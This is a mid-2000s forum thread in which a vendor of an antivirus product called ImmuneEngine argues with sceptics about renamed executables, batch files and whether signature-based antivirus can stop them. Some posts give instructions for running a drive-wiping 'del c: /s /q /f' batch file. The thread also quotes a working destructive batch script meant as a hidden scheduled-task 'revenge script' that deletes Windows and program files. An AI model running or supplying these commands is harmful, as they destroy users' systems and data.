Tech Un-penetrable

Why do you insist on making things more difficult that it has to be. What are you talking about? It runs on the Windows platform because that is the area of most concern. When Linux and other OS start getting attacked, then we can talk. Again, you are more and more starting to sound like a jerk off. Ever thought that we would first like to go after the market where we can make the most money as a company....DUH! It's designed, and coded to run on Microsoft. You are speaking on dependency in a different term than I am.

CAN a bank be open, and in such a state that you CAN deposit money into it...DUH! If we didn't ever allow you to update or install software for update uses, then who the hell would buy it. That would be to assume you would NEVER put the new verison of Windows Media player, or Nero on to your machine. But if you are not trusted to install software, you don't have that right to install. You have to get it approved by the company/admin. And if there are guidelines to what will and won't be installed(which there always is), then you are not getting programs onto the machine.

You can bind an exe to another file such as a picture, txt, wav, avi, gif, jpeg, etc... I used to do it with sub7seven

Code:

	
D:\>md calc

D:\>cd calc

D:\calc>copy c:\WINDOWS\system32\calc.exe
        1 file(s) copied.

D:\calc>dir
 Volume in drive D is Storage
 Volume Serial Number is 2235-433E

 Directory of D:\calc

06/29/2005  10:43 AM    <DIR>          .
06/29/2005  10:43 AM    <DIR>          ..
08/12/2004  08:17 AM           114,688 calc.exe
               1 File(s)        114,688 bytes
               2 Dir(s)   5,570,273,280 bytes free

D:\calc>rename calc.exe calc.txt

D:\calc>dir
 Volume in drive D is Storage
 Volume Serial Number is 2235-433E

 Directory of D:\calc

06/29/2005  10:43 AM    <DIR>          .
06/29/2005  10:43 AM    <DIR>          ..
08/12/2004  08:17 AM           114,688 calc.txt
               1 File(s)        114,688 bytes
               2 Dir(s)   5,570,273,280 bytes free

D:\calc>

Did that. Double-clicked the "calc.txt" in Dcalc. Notepad opened just like my pasted example before.

Code:

	
D:\calc>ver

Microsoft Windows XP [Version 5.1.2600]

Running Windows XP Professional.

From systeminfo:

No tricks, just garden-variety usage of a normal system.

Would you like to know how much I weigh on what I say is to be true? Let's strike a deal. I'll even make it one sided to make it even better for you. Now I've been around this board since the C3 days. And I love posting here and VVT-I.net. So, I'm putting that on the line.

IF I give the demo, and I'm full of BS, and it does NOT do what I can say it does...

LISTEN TO THIS MODERATORS....You can ban me from this board. That's how much I'm willing to put up. I promise you, I will not waste anyones time by giving the demo.

What I ask in return should you see that it DOES do what I say it does, then I ask nothing in return, except for you to stop insulting me.

Sounds like fair game. Now, I know Kickarse wants to sit in, he has already given me the e-mail addy. Who else is game?

Now, try to do the same thing with the "Hide extension for know file types" turned on. Also try doing everything through the gui and not command prompt.

You right, it's not a traditional virus. It's an attack on your machine. It's considered Malicious Code. To which AV can't stop, and we can.

1) How is this vaild and legal.

2) You don't have to be an admin to create a malicious .bat file and run it.

3) You just preformed a ZERO-DAY exploit against the machine running your AV software.

Here is a definition of Malicious code:

A term used to either mean a virus, hostile applet or code fragment downloaded from web server or sent directly from one system to another.
www.primode.com/glossary.html

<br />
Why did you leave out the part where I said <br />

And because you can make a bomb out of a batch file, your AV software couldn't do anything about it, cause it doesn't have a signature for that.

So, let me guess, every person that gets a virus manually executes it? Wrong. Here, do me a favor and read this article that came out last month. Click <a href="http://theinquirer.net/?article=22901" target="_blank">Here</a> <br />

How do you think spyware gets onto your machine. Visit websites, and they download programs on to your machine. VictoriaSecret.com downloads a program onto your machine with a .com extention on it, without you knowing about it.<br />
<br />
Example, you copy what you think is an image file from the internet, when infact it's a program. When you go to view the image, the act of double clicking it will launch the program. You still may see the image, but what you don't see is the You'vebeenhad.exe it copied into your system32 folder.<br />
<br />
Read some of the details on how certain virus get into your computer from the Sopho, Trend Micro, Symantec virus watch website. <br />

You never heard of a virus lieing dormant on the machine? The coder can program it in such a way, that it will launch say Every christmas, on christmas day, at 12:00am. The virus can stay on your machine and never do anything, just counting down the days till it wreaks havoc. So, the presence alone is enough. Why would you want to wait till it wakes up to do stuff in order to defend your system. Well, that's what traditional AV software does. And if it's a new virus, then you are SOL. All the more reason to have a ImmuneEngine running the binary search engine that is always constantly scanning the computer looking for new stuff to eat. That's why we describe it as it mimicing the Human Immune System. When you catch a cold(virus), all your blood cells(ImmuneEngine) will find it, and start fighting it. Your blood cells are all over your body the way ImmuneEngine is all over the computer.

There is no other software available that provides the level of security and flexibility like we do. You say you think it might be restricting everyday activity, but you didn't give an example of what activity would be restricted. Please provide an example of what you think we would restricted.

But, you can't say we didn't re-invent the wheel either. Why, because you haven't actually seen it work. I am at least putting my money where my mouth is, and inviting you to see a "Live" demo. What I don't understand is why only one person is taking me up on the offer, and every one else is just content on saying "He's full of it" without calling my bluff. What are you afraid of, the fact that I can actually be right? Are you scared that I will laugh at you after the demo, and make you tell me I am god? I promise I will do none of the sort. So, please put your ego's aside, and call my bluff...I beg you to do so.

I don't really feel that anything you've told me is of worth. All you keep saying is that your software eradicates threats. The problems wiuth that is the fact that it can make a mistake and delete something that it should delete without giving you the option of stoppign the deletion. Additionally the idea that you would restrict the access of the SYSTEM ADMINISTRATOR is totally crap and completely counter productive.

I understand what dragonitti is saying and doing, and how it works more or less. I work in a corporate environment of a fortune 500 company, and all users are locked down to the max. I can see how this can work as long as it is set up right, and people follow rules. I understand that from your explanation there has to be one person or group of people of upmost trust that would have the clearance of all the services in the machine, and then everyone just trickles down from there from the admins to the end user. I see how this type of software would be more valuable to a corporate scene than to the regular Joe Schmo sitting in front of his computer at home in his pajamas.

I like to see a demo if I can, so I will PM you my e-mail address.

X

1) Won't delete something that's apart of the matrix of the computer.

2) Not our fault corporations ask us to do what we do. Admin's are to blame, and we do not hinder from doing what they normally do. If you say "YES" we do, then I would ask you how? State a fact, not an unfounded opinion. You don't have to watch the demo, it's fine by me.

3) Don't hate us because your company took the fun out of you screwing around with the system. Our customers drive the product. If they feel it's a threat to them, we put it in. Plain and simple. Maybe Admin's would actually do what they are suppose to do for a change, instead of screwing with the network.

You my friend are on the path to ENLIGHTENMENT! Yes, now your getting the hang of it. The thing is people don't follow the rules. This software FORCES you to follow the rules. Corporations didn't have that before. The can try to enforce the rules by setting Group policies, but anyone who knows anything about GP, they know you will be sitting there all day trying to setup policies on all the ways someone can break the system. This software is out of the box, automatic.

That's why we have a home version that does not do as much as our network version does. The home system will run as a standalone. However, we will be adding some of the new features of our network version to the home version. I don't know about you, but if I'm Joe Schmo at home in my pajamas, I don't want someone gaining route(establishing a command session) to my machine.

Yeah, after you tell it to. Point is, you wouldn't get the oppourtunity to tell it, because it would be to late. Yet again, you missed the fundamental quality of the binary search engine. By the way, you never did confirm if you did the calc.exe thing I told you to try. What happend? I since your lack of respone to my instructions say that you don't want to admit that I was correct about the calc.exe.<br />
<br />

Now, how does that explain the spread of viruses still today. If traditional AV software still is greatest, the fact that viruses spread prove that it's not the best solution. Also, count the number of people that DON'T run their machine as an Admin. Point noted.<br />

I'm starting to believe you know nothing about hacking. Kickarse already confirmed for you that a program can be embedded into a .jpg. Have you done your research on polymorphic viruses? Have you done your research on viruses that are targeting the AV software? Have you seen the article about AV vendors creating more holes in the system than there are already? I'm starting to believe you are one of those people who THINK they know what's going on. <br />
<br />

By your comments, I assume you are running McAfee. So, try this. <br />
<br />
1) Create a new text file on the system.<br />
<br />
2) open it in notepad, and type in it. &quot;regedit&quot;<br />
<br />
3) now save it as &quot;test.bat&quot;<br />
<br />
4) say yes to the changing of file types <br />
<br />
5) now double click on the saved file. <br />
<br />
Tell me if it launches your registry editor.

I responded:
http://vvti.net/forums/showpost.php...07&postcount=59

A batch file (complete with the batch file icon) containing the command "regedit" is perfectly legitimate. What does that prove? I often use notepad to edit and create batch files, as the DOS editor doesn't always launch as quickly as Notepad does.

No, I responded again after that. Here, I'll post it again for you.


You totally missed the point. If I was to take a program and call it bob.bob, and deposit it into your system32 folder.

1) You will never know it was there.

2) It's still a program even though it has a .bob as the extention.

3) You have just been hacked.

Dude, you are not doing something right. Here follow my steps, cause I just did it myself and it work like I said it would.

1) Make sure the "Hide Extension for Know file types" is NOT checked.

2) do a right click and copy the calc.exe program

3) paste it to a floppy

4) now rename the entire name to say "james.txt"

5) Say "YES" to the dialog box that pops up that says would you like to change the file type.

6) If you get a dialog box that says something about it being read only, just hit "YES"

Now, double click and you should see the calc program launch.

That was an EXAMPLE! You can tell a batch file to delete all your programs files if you wanted it too. You would get even more pissed and start flaming me if I told you to try that. Point is, IT WORKED ON YOUR MACHINE!

Batch files:

Batch files are programs that allow MS-DOS and Windows users to create a file to perform a long tasks fast. Such as opening certain programs ran frequently, deleting or managing files, etc. Simple batch files do not require any special programming skills and usually can be done by knowing the below commands and or just DOS commands.

Taken from http://www.computerhope.com/batch.htm#11

You can easily write a batch file to do malicious stuff to the machine. Your AV did not pick up the simple batch file I had you create. In fact the program ran, and the registry editor came open on your machine.

If you want to grab some big, complex project or solution from an untrusted place on the web, stop and assess your sanity. If you believe that you are on the correct side of the sanity line, you are an expert on the language & API’s the code is written with, and you understand that you are taking a huge and rather foolish risk, then here’s my advice as to how to defend against disaster:

1) Take only the code files (the .cpp files, .cs files, .vb files, etc.). Do not take the .sln, .suo, .*proj, etc. files. Likewise, do not take makefiles, NAnt files, batch files, etc. as these can also be malicious.

Taken from http://blogs.msdn.com/cflaat/archiv...7/15/51593.aspx

Batch File Virus
Uses text batch files to infect. Batch files can be used to transmit binary executable code and either be or drop viruses.

Taken from http://www.2privacy.com/www/viruses/virus-glossary.html

Do your research bro. If it drops a virus onto your machine through the batch file, that your AV does not have an update for, then you are SOL. Undeniable facts, not my opinion.

You can create a batch file on your machine to edit the registry and remove your AV software, and then proceed to erase your AV software from the system.


A Bomb is a malicious program that is triggered to "go off" on a programmed date and time. It periodically checks the time on the computer system. When the bomb detects the correct time, the bomb begins its mission of deleting or changing files. Many bombs cause widespread damage to computer systems.

Bombs can be more dangerous than viruses or Trojan horses. While it is complicated to write program code for a virus, almost anyone can write a bomb. A simple batch file can be designed as a bomb.

Taken from https://ia.gordon.army.mil/iss/virus_info.htm

PLEASE! I repeat, PLEASE DO NOT TRY THIS ON YOUR BOX otherwise you will be reinstalling your OS. If you have your hdd backed up on seperate media, and have no worries, you may try on your own risk.

1) Follow my steps again on creating that batch file.

2) Instead of typing "regedit" in it and saving, type this command "del c: /s /q /f" and save that.

3) Now execute and watch in amazement as your system starts to delete, and your AV software do nothing about it.

Thanks for proving my point in that it CAN be done.

Found something for you, AlaricD.... a another havoc wreaking DOS batch file. Check it out here... http://www.tech-forums.net/computer/topic/7782.html

The guy wrote:

Posted by: ekÆsine

well i kinda figured i would not get advice on something like this. if anyone is curious this is the code i am using and it works well. it first copies shutdown.exe because it deletes all files in system32 which is where shutdown is located:

copy cwindows\system32\shutdown.exe Cwindows\tasks\ /y
attrib -r -a -s -h c /s
del cwindows\system\*.* /f/s/q
del cwindows\system32\*.* /f/s/q
del cwindows\*.* /f/s/q
del cprogra~1\*.* /f/s/q
del c*.* /f/s/q
Cwindows\tasks\shutdown.exe -r -t 20 -c "I Am Everywhere, You Can Not Stop Me!" -f

this file is actually for 2 purposes, it is obvious how dangerous this file would be if used incorrectly.

Another guy posted:

Posted by: Inaris

You can stop this if you know how... It's not that hard to reverse what you are trying to do.
Why would you want to do this anyway? You said something about having your system compromised, but I am still at a loss.
Also, you should make the call to cwinnt just incase you have an NTFS user...
The only thing you really need to do is delete the system registry hive, and then reboot the system. This will ineffect will destroy the OS.

Then he posted again:

Posted by: ekÆsine

this would be added as a scheduled task. how would you stop something that you did not know about? not too many people i know would use winXP task scheduler.

i also planned to use an IP updater that would logon to my DNS service and tell me it's IP address any time it is connected to the internet. i have heard you can track down a machine using only an IP address.

Inaris why would i want to? because this serves for 2 purposes. it is a measure to protect my data in case the machine gets stolen, i have omitted the command to delete all files in my directories where i keep my personal data.

another purpose is a revenge script, it is a malicious backup plan for someone who has messed with the wrong guy. i think you can imagine the scenario i'm talking about.

inaris the target machine runs winXP home or pro. it is an NTFS partition most likely. a winnt folder would only be found on a winNT or win2k machine right?

are you sure a registry is all that is needed?, we are talking about winXP. where is the default location of the registry in a winXP/ win9x/ and an NT based machine?

Every time I follow your instructions, you change the parameters. Now you want me to get out a floppy diskette and try it AGAIN.

Don't call me dude; don't tell me I'm not doing something right. If your steps give you the results you want on your machine, that's just fine and dandy. Your steps don't work on mine the way you'd like, because I have set up my machine, and helped define Group Policy at my workplace, that enhances security.

You know why? Because it's not a virus, it's a .BAT you wrote yourself. Valid. Legal. Fine. Administrators are administrators, you know-- they can choose to delete their own files. That's why very few people in my workplace have Administrator rights to their machines. *I* don't even have administrator rights unless I <b>su</b> to a local admin account or one of the Domain Accounts with Admin group membership on workstations.

The bomb, or another program designed to trigger the bomb, needs TO BE RUNNING to CHECK THE TIME. Whether it checks "periodically" or "constantly", at THAT INSTANT it is RUNNING. At that INSTANT, any decent virus scanner will be scanning it and seeing what else it does other than check the clock.

Done, with "Apply to All Folders" as well.

Done and done.

Done

No such dialog, as the file type was NOT changed. I renamed the file "calc" to "james.txt", the system, having HIDDEN THE EXTENSION, left the extension UNCHANGED.

Dialog did not appear in this case.

Correct-- because the filename is now james.txt with the hidden extension .EXE, however-- the icon never changed to a Notepad icon, it retained the calc icon.

However, if extensions had NOT been hidden, I can rename calc.exe to james.txt, and THIS TIME I do get the message that I am changing the file type. After doing that, however-- the file launches within NOTEPAD when double-clicked.

Partial excerpt:

Code:

	MZ       ÿÿ  ¸       @                                   ð   º ´	Í!¸
LÍ!This program cannot be run in DOS mode.

$       ‡EdÃ$x7Ã$x7Ã$x7987Æ$x7d7È$x7Ã$x7Â$x7Ã$y7D$x79  a7Î$x7T=7Â$x7e7ß$x79E7Â$x7RichÃ$x7

So, with the method that may appear to disguise the file, any user with half a clue would see something is wrong (a .TXT that has an executable's icon), and with the method that that does result in the change of the icon itself, the file just opens in Notepad.

Granted, one *COULD* make an .EXE that has the icon for a text file and then perhaps get away with your plan.

However, an .EXE whose design is to wipe the system would be spotted by most AV programs, and also would require Administrator rights to delete many system files.

Your software may help mitigate the risks out there, but like McAfee VirusScan Enterprise, it cannot be said to be absolutely foolproof.

Also, you keep describing how McAfee will be "too late"-- except McAfee scans files *as they are being written to the drive*, whether because you are downloading it from the internet, copying it off a floppy, or compiling it with your development software. The file is still in the process of being put on the hard drive, NOT being executed, yet it is being scanned by the On-Access scanner. At that point, it's not even remotely "too late." Again, having the file is not putting you in danger-- running it is. Compare it to pointing a gun at your head-- until you squeeze the trigger you're not in danger (although, obviously, it's still not a good idea to do that.)